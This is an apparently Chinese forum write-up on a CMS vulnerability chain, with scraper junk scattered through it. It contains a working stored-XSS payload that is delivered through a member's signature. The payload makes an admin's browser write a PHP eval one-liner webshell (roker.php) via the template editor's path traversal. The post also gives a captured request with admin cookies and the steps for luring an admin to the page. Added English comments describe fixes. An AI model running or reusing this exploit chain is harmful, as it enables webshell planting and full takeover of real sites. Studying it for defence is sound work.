|
这个 CMS 以前 90 有人发过一个 getshell，当时是后台验证文件的问题。
官网已经修补了，所以重新下载了源码。
因为后台登录还需要认证码，所以注入就没有看了。
存在 XSS。
漏洞文件：user/member/skin_edit.php
! a* P) N; g+ P" n4 P7 \7 M本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:# W* @& ~4 U f+ F! N% F3 h
F" b! @* D# ^4 u! U6 F- T0 Z</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
$ m' k1 Z% h2 j+ H4 A$ C
1 Z2 j8 B! ^: T</textarea></td></tr>
4 K! k% b0 G4 U3 n1 ?# M
user/do.php
9 a! Z: o% }' O
4 v/ [! s5 R3 }% q" ~* \
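if($op=='zl'){ // 资料 (profile update)
	// Every CS_* value is request-supplied (CS_Qianm is the signature textarea posted
	// from user/member/skin_edit.php). NOTE(review): where $cscms_name comes from is
	// not shown in this excerpt; it is treated as untrusted as well.
	if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
		exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));

	// The original spliced the raw values straight into the UPDATE string: a quote in
	// any field alters the statement (SQL injection), and the signature was stored
	// verbatim and later echoed unescaped (stored XSS). $db->query() is only seen
	// taking a raw SQL string, so the stdlib-only hardening possible here is to escape
	// each string value into a local copy and force the numeric column to an integer.
	// Local copies keep the caller's variables unchanged for any code that follows.
	// NOTE(review): if the project's $db layer offers prepared statements or its own
	// escaping, prefer those; and if inputs are already escaped upstream (magic_quotes
	// or a request filter), this would double-escape and must be dropped.
	$sql_nichen = addslashes($CS_Nichen);
	$sql_email  = addslashes($CS_Email);
	$sql_sex    = intval($CS_Sex);
	$sql_city   = addslashes($CS_City);
	$sql_qq     = addslashes($CS_QQ);
	$sql_qianm  = addslashes($CS_Qianm);
	$sql_name   = addslashes($cscms_name);
	$sql="update ".Getdbname('user')." set CS_Nichen='".$sql_nichen."',CS_Email='".$sql_email."',"
		." CS_Sex=".$sql_sex.",CS_City='".$sql_city."',CS_QQ='".$sql_qq."',CS_Qianm='".$sql_qianm."'"
		." where CS_Name='".$sql_name."'";

	if($db->query($sql)){
		exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
	}else{
		exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
	}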
( W* V% x- m& T# Y& T3 W
* c3 f! e* \3 v# a5 {- {
没有过滤，导致 XSS 产生。
后台看了下，很奇葩的是可以写任意格式的文件。
抓包。
+ \! Y# i' I8 U* e U1 v5 f' {, J* f# x6 C5 \0 P+ v: C
* H' T* h! e) ~本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1+ c7 m$ P; |$ e0 ]" n
& j, {9 w) }* S2 r7 I6 z a
Accept: text/html, application/xhtml+xml, */*' f* `1 j1 k# C& H) q; X- \& i
2 l' \6 @! v. U6 ], I3 x# h- qReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
* i2 P2 X' s3 f9 `* e# f / I# U( I* v" t2 B `
Accept-Language: zh-CN0 R: T4 g3 ?7 S" L
0 b1 @- B" I, h) j7 L( hUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)1 W# B. _& t0 @6 ?9 @8 [( D2 _
9 N* I7 \/ r9 V" A: B
Content-Type: application/x-www-form-urlencoded
2 J: Q- R" x3 N5 N: H% ?5 U
2 v) \: ]4 V- h, @; sAccept-Encoding: gzip, deflate
! c6 ], R1 h) Z6 p# H+ G2 i % T( _# S5 t1 ?: s& M
Host: 127.0.0.13 R) T2 m* S1 ~- j
( P4 Q: U$ ^8 G8 B% m5 H U; q2 BContent-Length: 381 O' }: `) u+ l
2 f- F+ @. s! o2 u5 ^4 Z9 H5 i; |
DNT: 12 E! T9 f* L; x: z" r2 B
7 V9 s' e7 V9 P1 S0 b$ c. l
Connection: Keep-Alive+ m& [' K+ g" i+ ]" N
& ~. v J8 \+ H0 T0 J7 z) ]Cache-Control: no-cache% U% K# ?$ ?" C8 Z( x- u. ^# h
! C$ G2 F! N7 w
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
' q' i1 o1 G+ y3 X' l- g5 ~
, n! _# m3 b, ~2 U- C* m6 V8 n+ t8 w. i0 }3 F/ C
name=aaa.php&content=%3Cs%3E%3Ca%25%3E
" q' Q, q6 S( x S6 m1 Y+ h$ a2 z# }/ o; }( a1 l2 W6 ~3 j" o
+ K0 i; s. P: G5 t5 T% g4 m1 P
于是构造 JS 如下。
6 d* x3 d+ z' {
5 L4 b0 V: `5 ~: W本帖隐藏的内容<script>
// Payload carried by the stored, unescaped signature: once rendered in an admin's
// browser it runs in the site's own origin and auto-submits a POST to the template
// editor, so the browser attaches the admin's session cookies by itself.
// Defences that each break it: HTML-encode the signature on output (skin_edit.php),
// require a CSRF token on skins.php, and allow-list the extension of the file it writes
// (the captured request above shows a .php name being accepted).
& w& ^6 e# K' V s' IthisTHost = top.location.hostname;2 U) ~- L3 E; l1 ^$ }1 _' y
// Editor URL is built from the page's own hostname; ac/op/path are the same query
// values as in the captured request above.
: L* U; S; m& [: a( O5 w1 ?9 gthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
1 B- d l4 {1 M( K3 W/ m$ b* e
// Builds a form with two hidden inputs ("name" <- data, "content" <- msg), appends it
// to the document and submits it to url as a normal form POST.
+ f" i/ |$ f$ v; y4 c. Zfunction PostSubmit(url, data, msg) { T5 a2 [3 c* E! i" X$ c7 _
var postUrl = url;
0 ]! ^. g' Q+ \- g, ? & b% H' O4 P* h5 |# z" |
var postData = data;
7 z2 N7 U! e9 G. J: `) D2 S, G var msgData = msg; 4 o2 Q# j" }7 W+ u( ^8 G6 }
var ExportForm = document.createElement("FORM");
! W% T- _6 o( u' C& E, d document.body.appendChild(ExportForm);
& z. [3 f1 v. n( u( {3 H6 j ExportForm.method = "POST";
2 [; \' f# p. Z0 ? var newElement = document.createElement("input"); . _& W h6 M. D5 W: M
newElement.setAttribute("name", "name");
; _ T# u! P! V- c. z; n: e" K6 E( ? newElement.setAttribute("type", "hidden");
8 ^7 T6 D% ?$ K& D5 R var newElement2 = document.createElement("input");
1 v$ |0 c2 R% v) h: x$ T newElement2.setAttribute("name", "content"); $ b, @& v3 ?& Y6 J [
newElement2.setAttribute("type", "hidden"); ~- Y/ H2 V, B; R
ExportForm.appendChild(newElement); 1 ?+ G C7 @! ~
ExportForm.appendChild(newElement2);
// Field values: "name" is the file name the editor writes, "content" its body.
& p! j# X6 ^, \6 r newElement.value = postData;
& S! o1 j$ V/ ]& G newElement2.value = msgData; . {9 c& |* k" @- }( C
ExportForm.action = postUrl; # c8 X8 A l3 Q4 G% Z" g x5 z
ExportForm.submit(); L5 y' x; A2 t9 Z% E# J
};3 M+ r; E5 [& l% J( o# m
. t8 v, [6 _7 z6 z7 E4 J. \
// Fires immediately on render; nothing here runs if the signature is output-encoded.
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");0 R" e0 j i0 C4 d" u: A( \! z6 R3 e
( j" M% e2 Z/ V! G9 ?/ ?1 c1 R' x</script>9 _0 ^! N% h+ D' p- B
. E$ N3 j' N# e) d4 ]# R: ?: t$ _
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处插入。
用你的账号给管理写个私信，或者让他访问你的主页 http://127.0.0.1/home/?uid=2（uid 自己改），
就会在 skins\index\html\ 目录下生成 roker.php 一句话。
" U/ v0 Q; f' i |
|